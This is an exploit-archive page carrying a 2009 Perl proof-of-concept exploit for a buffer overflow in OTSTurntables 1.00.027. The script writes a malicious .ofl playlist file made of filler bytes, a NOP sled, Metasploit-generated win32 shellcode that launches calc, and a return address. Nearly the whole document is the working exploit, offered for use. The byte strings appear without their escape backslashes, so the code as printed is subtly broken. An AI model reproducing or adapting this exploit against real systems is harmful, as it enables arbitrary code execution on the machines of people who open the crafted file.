OTSTurntables 1.00.027 (.m3u/.ofl file) Universal BOF Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : OTSTurntables 1.00.027 (.m3u/.ofl file) Universal BOF Exploit
# Published : 2009-04-08
# Author : AlpHaNiX
# Previous Title : Linux Kernel < 2.6.29 exit_notify() Local Privilege Escalation Exploit
# Next Title : Abee Chm eBook Creator 2.11 (FileName) Local Stack Overflow Exploit

#!/usr/bin/perl
# By AlpHaNiX [NullArea.Net]
# alpha[at]hacker.bz
# Made in Tunisia

my $junk      = "x41" x 96   ;     # whatever bytes
my $nop       = "x90" x 20   ;     # bla bla xD
# win32_exec -  EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub , thanks metasploit
my $shellcode =
    "x29xc9x83xe9xddxd9xeexd9x74x24xf4x5bx81x73x13xc9".
    "x2cxc9x40x83xebxfcxe2xf4x35xc4x8dx40xc9x2cx42x05".
    "xf5xa7xb5x45xb1x2dx26xcbx86x34x42x1fxe9x2dx22x09".
    "x42x18x42x41x27x1dx09xd9x65xa8x09x34xcexedx03x4d".
    "xc8xeex22xb4xf2x78xedx44xbcxc9x42x1fxedx2dx22x26".
    "x42x20x82xcbx96x30xc8xabx42x30x42x41x22xa5x95x64".
    "xcdxefxf8x80xadxa7x89x70x4cxecxb1x4cx42x6cxc5xcb".
    "xb9x30x64xcbxa1x24x22x49x42xacx79x40xc9x2cx42x28".
    "xf5x73xf8xb6xa9x7ax40xb8x4axecxb2x10xa1xdcx43x44".
    "x96x44x51xbex43x22x9exbfx2ex4fxa8x2cxaax02xacx38".
    "xacx2cxc9x40" ;
my $ret       = "x58xF6xE8x73"; # pop ebx pop ret
my $exploit = $junk.$nop.$shellcode.$ret;
open (file,">>file.ofl");
print file $exploit;
close (file);
print "donen";

# www.Syue.com [2009-04-08]